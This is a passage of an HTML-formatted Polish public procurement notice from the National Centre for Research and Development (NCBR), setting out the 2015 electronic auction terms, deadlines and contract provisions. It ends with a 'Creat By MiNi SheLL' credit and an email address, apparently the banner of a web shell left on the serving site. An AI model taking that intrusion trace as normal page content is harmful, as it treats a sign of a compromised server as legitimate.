dane postąpienie zostało złożone przed zamknięciem licytacji. 9. Zamawiający udzieli zamówienia
Wykonawcy, który zaoferuje najniższą cenę brutto. 10. UWAGA: Cena brutto wynikająca z licytacji
elektronicznej zostanie wprowadzona do umowy, i na jej podstawie zostanie wyliczona cena
jednostkowa pojedynczej wyceny.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 60 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 16.04.2015 godzina 12:00, miejsce: NARODOWE CENTRUM BADAŃ I ROZWOJU ul.Nowogrodzka 47A. 00-695 Warszawa KANCELARIA, pok.
204 piętro 2.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 7 dni po terminie przekazania zaproszeń, o godzinie 10:00..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Upływa w dniu otwarcia, o godzinie 11:00.</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>W niniejszym postępowaniu nie jest wymagane wniesienie zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia umowy, zawarte zostały we Wzorze umowy stanowiącym załącznik
nr 7 do Instrukcji dla Wykonawców zamieszczonej na stronie internetowej Zamawiającego
http://www.ncbr.gov.pl/bip/zamowienia-publiczne/</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie publiczne jest współfinansowane ze środków Unii Europejskiej w ramach... 2.
Instrukcja dla Wykonawców oraz niezbędne wzory druków dla Wykonawców dostępne są na stronie
internetowej Zamawiającego http://www.ncbr.gov.pl/bip/zamowienia-publiczne/.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com